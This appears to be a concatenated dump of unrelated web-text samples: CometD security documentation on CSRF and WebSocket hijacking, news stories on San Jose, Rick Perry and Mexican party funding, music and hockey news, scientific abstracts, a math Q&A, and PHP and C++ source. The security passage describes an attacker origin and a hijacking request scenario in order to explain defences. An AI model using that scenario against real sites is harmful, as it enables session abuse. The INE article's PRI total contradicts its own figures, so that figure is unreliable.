xref:_security_xss[XSS] to steal Alice's session id and then craft and send evil messages to the chat service _from Alice's browser_. Alice's browser will send the existing Alice's `BAYEUX_BROWSER` cookie along with the evil messages, and to the server the evil messages will be indistinguishable from legit messages sent by Alice, because they will carry her `BAYEUX_BROWSER` cookie and her stolen session id. CometD does not automatically protects against CSRF attacks, but these are easily counterfeit by configuring the cross-origin filter as explained in xref:_java_server_configuration_advanced[this section]. Alice's legit messages are sent by a script downloaded from the chat service, and therefore will have the following HTTP header: ==== [source] ---- Origin: https://cometd-chat.com ---- ==== Conversely, Bob's evil script is downloaded from `+https://evilbob.com+` and his evil messages will have the following HTTP header: ==== [source] ---- Origin: https://evilbob.com ---- ==== The application at `cometd-chat.com` can install the cross-origin filter and configure it to allow requests only from the `cometd-chat.com` origin, effectively blocking Bob's CSRF attack. This works because browsers are required to perform a _preflight_ request before sending a HTTP request to a different target origin. The preflight request will be intercepted by the cross-origin filter and denied. The unsuccessful preflight response instructs the browser that the script cannot perform any request to that target origin, and the browser will block the script from making requests to the target domain. [[_security_cswsh]] === Security against Cross-Site WebSocket Hijacking (CSWSH) attacks Cross-Site WebSocket Hijacking (CSWSH) is a variant of xref:_security_csrf[Cross-Site Request Forgery] but for the WebSocket protocol. Similarly to CSRF, Bob tricks Alice to look at a page at `+https://evilbob.com/cometd+` that downloads an evil script that opens a WebSocket connection to `+https://cometd-chat.com+` _from Alice's browser_. A WebSocket connection sends an initial HTTP request to the server. This initial HTTP request, triggered by Bob's evil script running in Alice's browser, looks like this: ==== [source] ---- GET /cometd HTTP/1.1 Upgrade: websocket ... Cookie: BAYEUX_BROWSER=...; JSESSIONID=... ... Origin: https://evilbob.com ---- ==== The initial HTTP request will have Alice's cookies (and possibly Alice's authentication headers), including the CometD cookie and the HTTP session cookie. However, it will have `+Origin: https://evilbob.com+` and not the expected `+Origin: https://cometd-chat.com+`. As with the CSRF attack, the application at `cometd-chat.com` can install the cross-origin filter and configure it to allow requests only from the `cometd-chat.com` origin, effectively blocking Bob's CSWSH attack. In this case, the cross-origin filter must be installed _before_ the WebSocket upgrade mechanism takes place, or the WebSocket upgrade mechanism must have a way to test against a configured list of allowed origins and reject the WebSocket connection attempt if the origin is not allowed.
{ "pile_set_name": "Github" }
Follow by Email About “Be the change you want to see in the world.” Mahatma Gandhi EcoFriendly Sask strives to inform, encourage, and support Saskatchewan environmental initiatives. As a small, personal undertaking, we provide an online publication as well as grants to support local environmental projects. The Calendar page lists upcoming events, and we maintain the conversation on Twitter, or like our Facebook. Individuals and organizations are encouraged to apply for grants of up to $500 to support local projects that will benefit the environment.
{ "pile_set_name": "Pile-CC" }
Manhattan is legendary for the numerous illuminations that continue to enchant the most modern city of New York, and they have been captured by innumerable photographers, artists and filmakers. Most celebrated are the lights of the city’s nocturnal slihouette viewed from Brooklyn, the buildings geometrically studded with changing configurations of lit windows, and the multiple screens that cover the vertical surfaces of Times Square, blaring commodities, celebrities and television shows in an endlessly changing postmodern collage that distracts and confuses vision. There are the brightly illuminated landmarks of the Empire State Building, New York Life Insurance Building, One World Trade Centre and Chrysler Building that provide orientation. And at Christmas time, the illuminated window displays of Macy’s and other department stores lure large crowds of onlookers after nightfall as does the renowned Christmas Tree at the Rockefeller Centre with is saturated festoons of lighting. However, I want to focus on three less famous attractions that were sited in Manhattan’s public spaces this year. Firstly, the World’s Largest Menora, celebrating the Jewish festival of Hannukah, lies at 5th Avenue and 49th Street, but rather than featuring this illuminated icon, I have included an image of the Christmas Tree at Wall Streeet at which a Menora is also situated, underscoring the multi-faith character of New York City as well as the ways in which many religions ritualistically deploy light to convey a host of symbolic meanings. Secondly, I have included the temporary installation New York Light, created by design company Inaba. Situated at the Flatiron Plaza next to Madison Square, this steel tube sculpture incorporates flashing LEDs that illuminate the cellular structure and are reflected by mirrored panels. Visitors can enter the enclosing form of the sculpture to experience a discrete calm space in the midst of busy traffic and pedestrian traffic flows, or they can step back and experience views that draw in the skyline, including the Empire State Building. The work convincingly transforms a familiar landscape so as to make it strange. It reconfigures the relationship of the square with surrounding buildings, and in attracting photographers, locals and tourists, it powerfully reanimates this well-known public space at night. Thirdly, since 2010, a giant string of 31 vintage Christmas lights has been installed during the festive period in front of the McGraw Hill Building on 6th Avenue, and they are now fitted with LED illumination. Together with the equally giant baubles that lie next to them, these striking lights were devised by PRG Scenic Technologies and designers from the American Christmas company. As enormous replicas of familiar everyday objects, they recall the gigantic modernist sculptures of Claes Oldenburg. This site has always warmed to the efforts of professional and amateur light designers that put on a Yuletide show. Christmas is the time of year when in accordance with ancient rhythms, the gloomy months are transformed by the deployment of bright lights to exterior and interior spaces. In many parts of the world, the holiday season continues to herald an ever-growing display of festive illuminations that include a variety of arrangements: indoor lights with which we garland Christmas trees and interior spaces, the festoons of strings of animated bulbs and illuminated figures that adorn house exteriors, and the large spectacles that festoon the streets and squares of city centre districts in endeavouring to attract shoppers and tourists to part with their money. This year has seen a particularly striking effusion of Christmas lighting, as exemplified by four extraordinary examples from different parts of the world. Let’s celebrate them! First, and exemplifying how Christmas is a time of magnificent excess, is the amazing choreographed sequences that are synchronised with selective pieces of festive music. Devised by Jeff Maxey at Yucaipa, California, the display incorporates 16 houses in creating an incredible son et lumière show https://www.youtube.com/watch?v=-yvBtccWnp4 Second, the lights of Tokyo offer a different aesthetic to the multi-coloured effects of other cities but the quantity utilised produced whole landscapes that are saturated with festive spirit. The annual Illuminating York light festival took place from 29th October to 1st November 2014. As well as featuring a couple of projections on some of the many magnificent, historic buildings in the city, a number of light artworks were installed across its medieval centre, transforming the ways in which this heavily visited, iconic tourist city was experienced at night. Ritchard Allaway and Luc Jones created a light sculpture that evocatively displayed the textures of concrete, situated in a green, meditative setting adjacent to the magnificent cathedral. Close by, Joanne Geldard installed an illuminated greenhouse etched with scenes from the unheralded edgelands and waste sites that surround the contemporary city, the greenhouse itself representing a fixture that signifies a blurring of the rural-urban divide. And in King’s Square, Twist Design situated The Wheels of Industry, a car fitted with stained glass windows that could be illuminated by pedalling on an adjacent stationary bicycle. Though heralding the potential for more sustainable forms of power generation, the work simultaneously honoured the disappearing heavy industries and industrial cultures that pervaded the northern cities of England. Several of the projections at the GSPF use objects or unexpected surfaces, exploring materiality and its transformation through projected images and patterns. Olaf Meyer’s The People’s Car, parked a few metres down a sidestreet, is a 1968 white Volkswagen Beetle with digitally mapped projected designs that flicker, undulate and turn. Swirly stripes alternate with dynamic go-faster patterns and blocked colours that emphasise the shape, movement and psychedelic associations of the iconic car. On a smaller scale, broken brickwork is piled up in a shopfront to extend the illusion of masonry being shattered with a hammer. Keith Deverell’s Foundation speaks to gentrification (an aspect of recent developments in the Gertrude Street neighborhood) and processes of demolition. A still image from the projection shows a moment of impact, with bits of actual brick arranged to appear to cascade down from the flickering light of the installation. These works move beyond treating the surfaces of buildings as screens for projection art. Instead, they extend and deepen the artworks by blurring the material and immaterial and working narrative into the pieces, telling stories of and through the objects they employ. Mounted at street level, visitors can get up close to these works, and although the mechanics of the projectors are evident, the effect is still intriguing (posted by Shanti Sumartojo). The Gertrude Street Projection Festival, on the edge of Melbourne’s city centre, runs from 18- 28 July. Works are projected at 30 sites and the GSPF enjoys a mix of contributions from major and emerging projection artists, community engagement partners and art students. This variety gives Gertrude Street a unique excitement, as visitors move from site to site, not knowing what content, scale or materiality to expect from each installation. While some of the major works are spectacular and impressive, such as Nick Azidis’ Lighthouse, a massive projection onto the façade of a housing tower, others are invite close scrutiny and engagement. Particularly bewitching and intimate is Arika Waulu’s Young Blood, projections into large glass jars hung around eye level in a shop window. The faces in the jars had been filmed underwater, and the vitrine surface of the glass enhanced the impression of submerged movement. Eerie and beautiful, one visitor described it as ‘pickled heads’. The macabre effect was enhanced by a large taxidermy zebra head behind it in the shop. Posted by Shanti Sumartojo
{ "pile_set_name": "Pile-CC" }
San Jose on Tuesday became the largest Northern California city to approve rules allowing medical marijuana dispensaries. But the move was a buzz kill for pot club activists, who called the new regulations unworkable and threatened to fight them in court or at the ballot box. The City Council’s decision to allow only 10 clubs to survive capped nearly two years of debate as nearly 12 dozen pot dispensaries spread across the city, raising concerns from neighbors and more than $1 million in tax revenue for cash-hungry San Jose. In April, the council moved toward limiting the number of pot clubs to 10, but marijuana activists lobbied city leaders to change their minds, arguing that the cap would result in Costco-sized marijuana superstores that would invite federal drug raids. After more than two hours of debate Tuesday, however, the council voted 8-3 to stick to its guns and keep the lid at 10, with no more than two in each council district. The clubs — which city officials say have all been operating illegally — will also be restricted to certain commercial and industrial areas and required to grow all their marijuana on site. “We’ll have something in place that will make it impossible for us to operate,” said Dave Hodges, founder of the All American Cannabis Club, one of the first marijuana dispensaries in the city. Walking a fine line But Mayor Chuck Reed, who voted with the majority to approve the regulations, said the city was forced to feel its way between the federal government’s ban on marijuana and California’s 1996 voter initiative allowing its use for the ill. “We’ve had a lot of people during our public process tell us we don’t know what we’re doing,” Reed said. “I guess we’ll find out. We’re going to muddle through and figure it out, and others will learn from our efforts.” Council members Ash Kalra, Don Rocha and Xavier Campos were on the losing end of the vote. Kalra favored recommendations from city planning commissioners, who reviewed the proposed rules over the summer and argued that the city should allow 25 pot clubs, be more selective in evaluating them, expand the zones where they would be allowed and allow off-site cultivation. “I do think we have more work to do,” Kalra argued. “I don’t think we’re there yet.” Councilman Pierluigi Oliverio initiated the debate two years ago when he proposed that San Jose regulate and tax medical marijuana collectives before it was overwhelmed with a rash of unregulated pot clubs. He pointed to the difficulties Los Angeles had in recent years reining in hundreds of new dispensaries. Oliverio proposed several modifications to allow off-site cultivation and more selectivity in choosing which of the roughly 140 clubs get to stay in business. But the only new proposal the council passed Tuesday was a requirement that the approved collectives include a licensed physician or registered nurse as an official. Even so, Oliverio supported the approved rules, noting that while they’re “not perfect,” they can and likely will be amended after they’re put into practice. “We clearly should do something,” Oliverio said. A relatively sparse crowd attended the hearing — mostly marijuana activists and collective owners urging more permissive rules. A few city residents, however, criticized cannabis club employees as little more than drug peddlers. Tili Ayala carried a sign reading, “Stop Selling Pot to Our Kids,” and complained of medical marijuana users abusing the law. The city’s marijuana zoning and regulatory ordinances will become effective Oct. 27 after a second vote of approval Sept. 27. The city plans to notify the pot clubs in early November of the date to submit applications for one of the 10 permits. They would be chosen in December and registered later that month or early next year. Threat of legal action City officials argued against a formal bidding process in which the collectives are chosen based on evaluations, noting that the process can take nine to 12 months and cost more than $500,000 if it includes expert consultants. Police Deputy Chief Dave Hober argued against the dispersed, off-site cultivation favored by the pot clubs, which say they are supplied by members who sell small amounts of surplus weed they grow themselves. Hober said robbers have intercepted marijuana deliveries to clubs and that firefighters have had to douse homes that burst aflame from indoor marijuana growing under high-powered lamps. But marijuana activists said they’d likely turn to voters or the courts to block San Jose’s new pot rules. Activists took similar action in San Diego after the city passed regulations earlier this year, gathering enough signatures to qualify a repeal measure for the ballot. That prompted city leaders to drop the rules. “If we don’t get our due process, we’ll find somewhere else to get it, whether it’s the court or the ballot box,” warned Lauren Vasquez, an attorney and medical marijuana patient. But Reed countered that if the clubs want to make things difficult, the “easy route” for the city would be to just “ban it altogether.”
{ "pile_set_name": "OpenWebText2" }
Kamasi Washington released one of our favorite records of 2017 with his Harmony of Difference EP, and now the prolific jazz saxophonist has announced a brand new LP. Titled Heaven and Earth, the double album follows Washington’s 2015 three-disc album The Epic. The record is out June 22nd via Young Turks. Washington said this of the new record on Twitter: “The Earth side represents the world as I see it outwardly, the world that I am a part of. The Heaven side represents the world as I see it inwardly, the world that is a part of me.” Joining him in this journey are contributors Thundercat, Terrace Martin, Ronald Bruner, Jr., Cameron Graves, Brandon Coleman, Miles Mosley, Patrice Quinn, Tony Austin. Update: Washington has shared the first two tracks from the album, “Fists of Fury” and “The Space Travelers Lullaby”, along with dates for an extensive world tour. Get all the info here. Last year, Washington collaborated with the likes of St. Vincent, Ibeyi, and Thundercat, and joined Terrace Martin’s all-star collective The Pollyseeds. He’ll appear alongside Kendrick Lamar, Flying Lotus, and more on Herbie Hancock’s forthcoming album. So happy to announce my new project, a double album called "Heaven and Earth!" The Earth side represents the world as I see it outwardly, the world that I am a part of. The Heaven side represents the world as I see it inwardly, the world that is a part of me. ????: B+ & Mike Park pic.twitter.com/52FvNKAIhA — Kamasi Washington (@KamasiW) April 9, 2018 Heaven and Earth Tracklist: Earth 01. Fists of Fury 02. Can You Hear Him 03. Hubtones 04. Connections 05. Tiffakonkae 06. The Invincible Youth 07. Testify 08. One of One Heaven 09. The Space Travelers Lullaby 10. Vi Lua Vi Sol 11. Street Fighter Mas 12. Song for the Fallen 13. Journey 14. The Psalmnist 15. Show Us the Way 16. Will You Sing
{ "pile_set_name": "OpenWebText2" }
Q: Generalization of Lévy's continuity theorem for nuclear spaces I am interested in a generalization of the following finite-dimensional results in infinite dimensional vector-space with nuclear structure, especially for the cases of the spaces of distributions $\mathcal{D}'(\mathrm{R}^N)$ and $\mathcal{S}'(\mathrm{R}^N)$. Theorem 1: Let $X_n$, $n\in\mathbb{N}$ and $X$ be random variables in $\mathbb{R}^N$ and $\Phi_n$ and $\Phi$ their characteristic functions. Then, $$\left( X_n \overset{\mathcal{L}}{\rightarrow} X \right) \Leftrightarrow \left( \forall \omega, \Phi_n(\omega) \rightarrow \Phi(\omega) \right).$$ Theorem 2: (Lévy's continuity theorem) Again, the $X_n$'s are random variable and the $\Phi_n$'s are their characteristic functions. Assume that the limit $\lim \Phi_n(\omega)$ exists pointwise and is denoted by $\Phi(\omega)$. We then have the equivalence: $(X_n)$ converges in law to some random variable $X$. $\Phi$ is continuous at $0$. Now I precise my question. Given a probability measure $\mu$ on $\mathcal{N}' = \mathcal{D}'(\mathrm{R}^N)$ or $\mathcal{S}'(\mathrm{R}^N)$, we can define its characteristic functional on $\mathcal{N}$ by $$\hat{\mu}(\varphi) = \int_{\mathcal{N}'} \mathrm{e}^{\mathrm{j} \langle u , \varphi \rangle} \mathrm{d}\mu (u).$$ This generalizes the concept characteristic function of a random variable (Bochner's theorem being generalized by Minlos's theorem). Is the following result true? Possible generalization of theorem 1: Let $\mu_n$, $n\in\mathbb{N}$ and $\mu$ be probability measures on $\mathcal{N}'$ and $\hat{\mu}_n$ and $\mu$ their characteristic functionals. Then, $$\left( \mu_n \overset{\mathrm{weakly}}{\rightarrow} \mu \right) \Leftrightarrow \left( \forall \varphi, \hat{\mu}_n(\varphi) \rightarrow \mu(\varphi) \right).$$ Similarly, can we generalize the Lévy's continuity theorem? Thanks for attention. A: There is a partial result due to Boulicaut (1973), which states Theorem: Let $E$ be a separable metrizable Hausdorff locally convex topological vector space. Then $E$ is nuclear if and only if for every sequence $\{\mu_n\}$ of tight probability measures, weak convergence to a tight probability measure $\mu$ is equivalent to the pointwise convergence of the characteristic functions of $\mu_n$ to the ch. f. of $\mu$. This makes characteristic function(al)s more useful than in separable Banach spaces, where they are only used for uniqueness but not weak convergence.
{ "pile_set_name": "StackExchange" }
<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Customer\Test\Unit\Model\Address\Config; class ReaderTest extends \PHPUnit\Framework\TestCase { /** * @var \Magento\Customer\Model\Address\Config\Reader */ protected $_model; /** * @var \Magento\Framework\Config\FileResolverInterface|\PHPUnit_Framework_MockObject_MockObject */ protected $_fileResolverMock; /** * @var \Magento\Customer\Model\Address\Config\Converter|\PHPUnit_Framework_MockObject_MockObject */ protected $_converter; /** * @var \Magento\Customer\Model\Address\Config\SchemaLocator */ protected $_schemaLocator; /** * @var \Magento\Framework\Config\ValidationStateInterface|\PHPUnit_Framework_MockObject_MockObject */ protected $_validationState; protected function setUp() { $this->_fileResolverMock = $this->createMock(\Magento\Framework\Config\FileResolverInterface::class); $this->_fileResolverMock->expects( $this->once() )->method( 'get' )->with( 'address_formats.xml', 'scope' )->will( $this->returnValue( [ file_get_contents(__DIR__ . '/_files/formats_one.xml'), file_get_contents(__DIR__ . '/_files/formats_two.xml'), ] ) ); $this->_converter = $this->createPartialMock( \Magento\Customer\Model\Address\Config\Converter::class, ['convert'] ); $moduleReader = $this->createPartialMock(\Magento\Framework\Module\Dir\Reader::class, ['getModuleDir']); $moduleReader->expects( $this->once() )->method( 'getModuleDir' )->with( 'etc', 'Magento_Customer' )->will( $this->returnValue('stub') ); $this->_schemaLocator = new \Magento\Customer\Model\Address\Config\SchemaLocator($moduleReader); $this->_validationState = $this->createMock(\Magento\Framework\Config\ValidationStateInterface::class); $this->_validationState->expects($this->any()) ->method('isValidationRequired') ->willReturn(false); $this->_model = new \Magento\Customer\Model\Address\Config\Reader( $this->_fileResolverMock, $this->_converter, $this->_schemaLocator, $this->_validationState ); } public function testRead() { $expectedResult = new \stdClass(); $constraint = function (\DOMDocument $actual) { try { $expected = __DIR__ . '/_files/formats_merged.xml'; \PHPUnit\Framework\Assert::assertXmlStringEqualsXmlFile($expected, $actual->saveXML()); return true; } catch (\PHPUnit\Framework\AssertionFailedError $e) { return false; } }; $this->_converter->expects( $this->once() )->method( 'convert' )->with( $this->callback($constraint) )->will( $this->returnValue($expectedResult) ); $this->assertSame($expectedResult, $this->_model->read('scope')); } }
{ "pile_set_name": "Github" }
Identification of immunoreactive tissue kallikrein in human ductal breast carcinomas. Various proteases have been shown to be present in malignant breast tissue. Although the question of the involvement of tissue kallikrein, a serine protease, in the pathophysiology of tumours has been raised, the presence of this enzyme in human breast carcinoma has so far not been examined. In the present study, both neoplastic and normal human breast are scanned by immunocytochemistry for the presence and cellular localization of tissue kallikrein. In the healthy breast, tissue kallikrein was observed as a deposit of immunoreactive material that localized in the apical portion of duct cells. In the malignant breast tumours surveyed, the enzyme was observed only in ductal carcinomas, whereas lobular carcinomas were devoid of immunostaining. In ductal carcinomas, the immunoreactivity for tissue kallikrein appeared to be associated with gradations of malignancy, being absent in dedifferentiated tumours. The presence of tissue kallikrein in malignant breast tumours poses the question of the role of this enzyme in malignant breast tissue. The enzyme may participate within the tissue either in proteolytic processes (it has been shown to activate procollagenase) or by enhancing vascularity or mitogenicity by the generation of kinins.
{ "pile_set_name": "PubMed Abstracts" }
Latest News The money is in Vancouver, the prestige in Montreal and Manhattan, but is Mats Sundin's heart still in Toronto? The whole National Hockey League is scratching its head about that logic after Sundin went back into his contractual cocoon yesterday, stunning among others, the Vancouver Canucks, who wanted to make him the league's richest player. There could be more Toronto complications for the Canucks -- the Leafs are one of seven teams interested in Vancouver centre Brendan Morrison, who so far is getting just a one-year offer from the Canucks for less than $2 million US. It was thought the Maple Leafs captain couldn't possibly turn down Vancouver's two-year, $20-million offer, not without the leverage of a Cup win or a Hart Trophy, but he politely told all suitors to give him some space. SINCERE INTEREST "I would like to thank all the teams who have expressed such sincere interest in my services," Sundin said in a release through agent J.P. Barry of Creative Artist Agency. "The numerous options provided to me were impressive and I have no doubt that each one presented a unique opportunity for me to finish my career in a terrific hockey environment. I spent a great deal of time (Tuesday) reflecting upon the (estimated nine) teams who stepped forward and the opportunities that each provided. "Unfortunately, I am simply not close to being ready to make a decision about resuming my career at this time. I wish all the teams the very best and thank them for their interest." Claes Elefalk, who represents Sundin for CAA in Sweden, told Sun Media's Mike Zeisberger not to expect a quick decision. "It is more likely to take a month than a week before Mats knows himself what he will want to do," Elefalk said from Stockholm, where Sundin is now holed up. "Right now he simply does not know what he wants to do. "In one month, his answer could very well be 'no' to everyone. It could go much longer. He is still uncertain whether he wants to play any more. "He is aware the hockey world is in full spin. But he's not ready and he can't let anyone on the outside affect him." Toronto general manager Cliff Fletcher thought the door was closing here for Sundin at least three times the past few weeks; when he turned down a $7 million, one-year deal, when Fletcher granted the Canadiens exclusive rights to get a deal up to July 1 and when the Canucks made Tuesday's eye-popping offer. But Fletcher and Barry both have been careful not to rule out 100% that Sundin won't return. "Well, we know that Mats is a very conservative person," Fletcher said. "At some point, our team has to move ahead and plan to open up for next year, but if something happens at a later date with Mats, we'll deal with it then." Whether by design or not, the Leafs were not involved in yesterday's second round of free-agent bidding Fletcher said he still will seek a forward and defenceman, but added it's possible the Leafs are done. If he doesn't commit millions to Morrison or another forward in the coming days, it might not be so much saving money for Sundin as underlining what few impact scorers remain UFAs. "After the initial free agent frenzy, things can be fairly quiet," Fletcher said, adding he was glad most of the big names such as Marian Hossa, Brian Campbell and Sean Avery all went to the Western Conference. After picking his jaw off the floor at Sundin's announcement yesterday, Canucks GM Mike Gillis is said to be redoubling efforts to keep Morrison, who is being pursued by the Leafs and the Columbus Blue Jackets among others. Gillis probably had visions of Markus Naslund and Sundin as the marquee first line and the Sedin Twins topping the bill on the second. But he could end up without Sundin, Naslund or Morrison. The other GM in a jam is the Canadiens' Bob Gainey, now without Sundin or Hossa and possibly considering Naslund or Jaromir Jagr. Jagr is also mulling over an offer to return to Pittsburgh.
{ "pile_set_name": "Pile-CC" }
Comisión del INE aprobó 5 mil 239 mdp de financiamiento para entregar a partidos políticos en 2020. México.- La Comisión de Prerrogativas y Partidos Políticos del INE aprobó 5 mil 239 millones de pesos de financiamiento público para las actividades de partidos políticos en 2020. En un comunicado, el Instituto Nacional Electoral (INE) informó que el anteproyecto de acuerdo del Consejo General fijó la distribución de los montos a entregar para el próximo año, conforme a lo establecido en la Constitución y en los ordenamientos correspondientes. Puedes leer: INE anuncia recorte de presupuesto que impactará en trámites de credencialización De esta forma, será el Movimiento de Regeneración Nacional (Morena) el partido que más recursos ingrese, pues en la votación de la Cámara de Diputados de 2018 obtuvo el porcentaje más alto de respaldo entre los ciudadanos. ¿Cómo se dividen los recursos asignados por el INE a los partidos políticos? El financiamiento para 2020 se distribuirá conforme a 4 rubros de gasto establecidos por la autoridad electoral: actividades ordinarias, actividades específicas, franquicia postal y franquicia telegráfica. El presupuesto de actividades ordinarias y específicas se dividirá 30% de forma igualitaria y 70% proporcional a la votación obtenida; en tanto que las franquicias postal y telegráfica se distribuirán de forma igualitaria entre todos los partidos nacionales. Recomendamos: Senado subasta 76 autos como medida de austeridad Los montos previstos por rubro por el INE son: $4,988.864,914 para actividades ordinarias; $149,665,947 para actividades específicas; $99,777,300 para franquicia postal y 693 mil 490 pesos para franquicia telegráfica. En el anteproyecto aprobado se contempla el gasto en franquicias postal y telegráfica sólo hasta el primer semestre de 2020, pues la autoridad electoral esperará a conocer si aparecen nuevos partidos con registro oficial para redistribuir la mitad de los recursos previstos para el segundo semestre. En caso de que no se otorgue el registro a partido político alguno, se mantienen los montos indicados. Morena, PAN y PRI, los que más dinero recibirán en 2020 En el caso de Morena, que es el grupo político que más dinero recibirá, los recursos asignados por actividades ordinarias corresponden a $1,653,944,795, mientras que por actividades específicas ingresará $49,618,343. En lo que hace a su porcentaje por franquicia postal y telegráfica, los montos son de $7,126,950 y $49,535, respectivamente. En total, el partido del presidente Andrés Manuel López Obrador recibirá mil 661 millones 171 mil 211 pesos como presupuesto para 2020. A dicha partida deberá sumarse un estímulo para el liderazgo político de las mujeres por $49,618,343. El segundo partido en ingresos para el 2020 será el PAN, con $908,790,729 por actividades ordinarias; $27,263,722 por actividades específicas; $7,126,950 por franquicia postal y $49,535 por franquicia telegráfica; para un total de 943 millones 230 mil 936 pesos de ejercicio de recursos en 2020. Los blanquiazules también recibirán un estímulo para la participación política de mujeres por más de 27 millones de pesos. El tercer partido con el mayor número de recursos es el PRI, con $856,063,024 por actividades ordinarias; $25,681,891 por actividades específicas; $7,126,950 por franquicia postal y $49,535 por franquicia telegráfica; para un total de 88 millones 921 mil 400 pesos. Los tricolores también contemplan más de 25 millones 600 mil pesos por el estímulo político a las mujeres. El anteproyecto aún deberá ser analizado, discutido y aprobado por el Pleno del Consejo General del INE. En términos generales, el presupuesto representa un incremento de más de 237 millones de pesos respecto a lo ejercido en 2019.
{ "pile_set_name": "OpenWebText2" }
And the NRA's ability to get an exemption from a bill that would require full-disclosure of an organization's campaign spending also illustrates the horribly corrosive consequences of special interest influence. Democratic leaders have lost their self-respect, and the NRA's willingness to play bully extends far beyond gun laws. On the same day the deal was revealed, local advocates for public financing of congressional campaigns made their pitch to the Express-News Editorial Board. The bill would provide $900,000 to House candidates who are able to raise $50,000 from $100 contributions in their home state. The funds would be split between primary and general elections. Senate candidates would get $1.25 million plus $250,000 per congressional district in their state. Candidates would have the right to opt out of the public financing system. The theory behind the effort is that politicians use too much time dialing for dollars and practically sell their souls raising money to get elected and re-elected. Both claims are credible. Lawmakers could represent their constituents better if they weren't preoccupied with the money chase. The Democrats' willingness to give the meanest dog on the block an unseemly special deal in their campaign reform measure proves just how little soul is left on Capitol Hill. Reform advocate John Courage, a Democrat who twice challenged U.S. Rep. Lamar Smith, R-San Antonio, said the current system makes members of Congress “very susceptible to owing the people that raised the money for them.” No kidding. The status quo is nauseating. But the reformers are running against a strong wind. A year dominated by a wave a national anger over federal spending and the mounting debt is a bad time to pitch the idea of getting the public to pay for political campaigns. It doesn't matter how sensible the plan may be. Giving politicians tax dollars for their campaigns would make voters even madder. Advocates say the public financing reform would cost about $850 million a year, but would save far more than that by reducing the ongoing rampage of earmarks. The legislation would pay the tab by auctioning the unused portion of the broadcast spectrum and using 10 percent for the campaigns. As of this week, 151 co-sponsors, mostly Democrats, were backing the bill in the House. Supporters include Rep. Solomon Ortiz, D-Corpus Christi. Most conservatives aren't buying it, and they are the ones catering to the angry tea party nation. This bill isn't going anywhere for now. Coupled with the insidious influence of gerrymandered districts, the huge power of special-interest contributions robs average voters of the influence they deserve with their lawmakers. It also helps keep strong challengers off the ballot in most congressional districts. The idea is worth debating, but the public financing structure for presidential races has been made obsolete by the huge amounts of private money accessible to candidates, such as President Barrack Obama. The proposed congressional plan is a start, but it does not offer a comprehensive solution.
{ "pile_set_name": "Pile-CC" }
Succinic acid production by a newly isolated bacterium. A new bacterial strain producing succinic acid was enriched from bovine rumen content. It is facultatively anaerobic, belongs to the family Pasteurellaceae and has similarity to the genus Mannheimia. In batch cultivations with D-glucose or sucrose the strain produced up to 5.8 g succinic acid l(-1) with a productivity and a yield of up to 1.5 g l(-1) h(-1) and 0.6 g g(-1), respectively. With crude glycerol up to 8.4 g l(-1), 0.9 g l(-1) h(-1) and 1.2 g g(-1) were obtained.
{ "pile_set_name": "PubMed Abstracts" }
Bob Dylan Shot of Love LP The 21st studio album from Bob Dylan was released in August of 1981. Considered to be the final album in a trilogy of Christian albums, the arrangements are rooted more in rock 'n' roll and less in gospel. "Every Grain of Sand" was noted as a stand-out track by Paul Nelson of Rolling Stone while Bono, of U2, described Shot of Love as one of his favorites due to Dylan's singing ability.
{ "pile_set_name": "Pile-CC" }
Yesterday, a grand jury in Travis County, Texas, indicted animatronic grizzly bear/"abortion-mill" truther Governor Rick Perry on two felony counts of "Abuse of Official Capacity" and "Coercion of Public Servant." I guess that's what happens when you cut off funding from a state corruption investigation team, demanding that its head, the district attorney, step down. Oops. Earlier this afternoon, Twitter was, uh, a-twitter with news that a judge had struck down that… Read more Read more The indictment stems from an incident surrounding the position of Travis County district attorney Rosemary Lehmberg. Lehmberg is a powerful prosecutor, a prominent Democratic voice, and head of the Public Integrity Unit, which investigates corruption perpetrated by state-level officials. Last year, Lehmberg was arrested for driving while intoxicated and accepted a 45-day jail sentence though she only served 20 days. Her drunken belligerence towards the police that arrested her was caught on tape and widely disseminated—multiple suits were filed against her, calling for her removal (something she pointed out was never demanded of any other male state or county officials who committed a DWI). Perry himself threatened to veto $7.5 million in state funding to the PIU unless Lehmberg stepped down (which would have allowed him to replace a key Democrat in a powerful position with someone a bit more compatible with his political leanings). When she refused to step down, he went ahead and cut off the funding. At the time, the PIU was looking into alleged ethical breaches and mismanagement of grants at the Cancer Prevention and Research Institute of Texas—a state government agency and one of Perry's projects. It was this veto that compelled non-profit watchdog group Texans for Public Justice to file a complaint, for which a judge appointed a special prosecutor. Of course his supporters have disparaged the indictment as a witch-hunt and Mary Anne Wiley, general counsel for Perry stated: "The veto in question was made in accordance with the veto authority afforded to every governor under the Texas Constitution. We will continue to aggressively defend the governor's lawful and constitutional action, and believe we will ultimately prevail." Perry faces a maximum 109-year sentence if found guilty. I guess we will have to simply wait and see just how long this case will drag out and exactly how this whole thing will affect Perry's presidential ambitions.
{ "pile_set_name": "Pile-CC" }
![](indmedgaz71984-0050){#sp1 .238}
{ "pile_set_name": "PubMed Central" }
/*============================================================================= Copyright (c) 2001-2011 Joel de Guzman Copyright (c) 2001-2011 Hartmut Kaiser Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) =============================================================================*/ #if !defined(SPIRIT_SEQUENCE_APR_22_2006_0811AM) #define SPIRIT_SEQUENCE_APR_22_2006_0811AM #if defined(_MSC_VER) #pragma once #endif #include <boost/spirit/home/qi/operator/sequence_base.hpp> #include <boost/spirit/home/qi/detail/fail_function.hpp> #include <boost/spirit/home/qi/meta_compiler.hpp> namespace boost { namespace spirit { /////////////////////////////////////////////////////////////////////////// // Enablers /////////////////////////////////////////////////////////////////////////// template <> struct use_operator<qi::domain, proto::tag::shift_right> // enables >> : mpl::true_ {}; template <> struct flatten_tree<qi::domain, proto::tag::shift_right> // flattens >> : mpl::true_ {}; }} namespace boost { namespace spirit { namespace qi { template <typename Elements> struct sequence : sequence_base<sequence<Elements>, Elements> { friend struct sequence_base<sequence<Elements>, Elements>; sequence(Elements const& elements) : sequence_base<sequence<Elements>, Elements>(elements) {} private: template <typename Iterator, typename Context, typename Skipper> static detail::fail_function<Iterator, Context, Skipper> fail_function( Iterator& first, Iterator const& last , Context& context, Skipper const& skipper) { return detail::fail_function<Iterator, Context, Skipper> (first, last, context, skipper); } std::string id() const { return "sequence"; } }; /////////////////////////////////////////////////////////////////////////// // Parser generators: make_xxx function (objects) /////////////////////////////////////////////////////////////////////////// template <typename Elements, typename Modifiers> struct make_composite<proto::tag::shift_right, Elements, Modifiers> : make_nary_composite<Elements, sequence> 